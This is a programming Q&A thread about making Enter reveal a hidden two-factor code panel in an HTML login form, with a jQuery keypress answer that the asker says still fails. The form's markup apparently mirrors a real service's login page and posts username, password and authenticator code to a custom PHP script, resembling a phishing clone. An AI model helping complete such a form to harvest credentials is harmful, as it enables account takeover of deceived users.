# How to let enter click a button when in a specific text field

Tags: javascript, jquery, html, css, forms

I have asked this before however, nobody seems to understand what I am asking for

I have a form that has two buttons. The first button is an input type="button" which simply unhides a hidden div. This hidden div contains another button which is of type="submit". Before the DIV is hidden. There is a username and password field - type="text". I want the user to be able to type in a username and password and then click the enter key to press the sign in button instead of having to move the mouse and click. The problem is, currently on the enter key press the WHOLE form is submitted and the hidden div does not show up, this is a problem because the hidden div contains another input that is a special verification pin.

```
<form action="/loginaction.php" method="post" name="submit" id='submit'>
<label for="userAccountName">username</label><br>
                <input class="textField" type="text" name="username" 
id="userAccountName" maxlength="64" tabindex="1" value=""><br>&nbsp;<br>
                <label for="userPassword">Password</label><br>
                <input class="textField" type="password" name="password" 
id="userPassword" autocomplete="off" maxlength="64" tabindex="2"><br>
<input class="btn_green_white_innerfade btn_medium" type="button" 
name="submit" id="userLogin" value="Sign in" width="104" height="25" 
border="0" tabindex="5" onclick="showDiv();">
```

The second submit button is here

```
<div id="showme" class="newmodal" style="position: absolute; z-index: 1000; 
max-width: 561px; left: 700px; top: 263px; display: none;">
            <div class="modal_buttons" id="login_twofactorauth_buttonsets">
        <div class="auth_buttonset" 
 id="login_twofactorauth_buttonset_entercode" style="">
            <button type="submit" class="auth_button leftbtn" data-
modalstate="submit" onsubmit="submitForms();">

                <div style="text-align: left" 
class="auth_button_h3">submit</div>
                <div style="text-align: left" class="auth_button_h5">my 
authenticator code</div>          
    </button></div>
```

https://jsfiddle.net/7edwsvat/

To summarize, I would like the user, when inside the username or password field to be able to click enter which will unhide the div. I would still like the enter key to submit the form in the next div though.

Still need help if anyone can

Comment: your jsfiddle does not work and in your example, there is no "second div" inside the hidden content... Can you provide a better example of what you try to do ?

Comment: I have added the second button, I would like the user when inside the username/password text field to be able to press enter to click the sign in button, which then unhides the hidden div and allows for more input and then press enter to submit the form.

Answer (score 0):

I just added a handler for the enter key press like so:

```
$('body').on('keypress', function(e) {

     if(e.which == 13) {
        showDiv();
    }
});
```

I have updated the jsfiddle https://jsfiddle.net/7edwsvat/2/ and now fires in to the function that you want. However, some of the function logic in the showDiv() function is incorrect, I have updated this also.

On a side note I added jquery to the project to make it a bit easier to select things.

Hope this helps.

Comment: Hi sorry for the dumb questions but where do I add the code that you provided?

Comment: If you open up the jsfiddle it should be added. But just add it after the other javascript.

Comment: Another really dumb question, with jquery do I need the <script> tags for it to run? also are two in the javascript section seperate?

Comment: You will need to add jQuery in somewhere yeah. If you look on the jQuery site it will tell you how to use it etc...

Comment: I have added jquery and inputted the function you provided however, when I press enter it still submits the form and doesn't show any div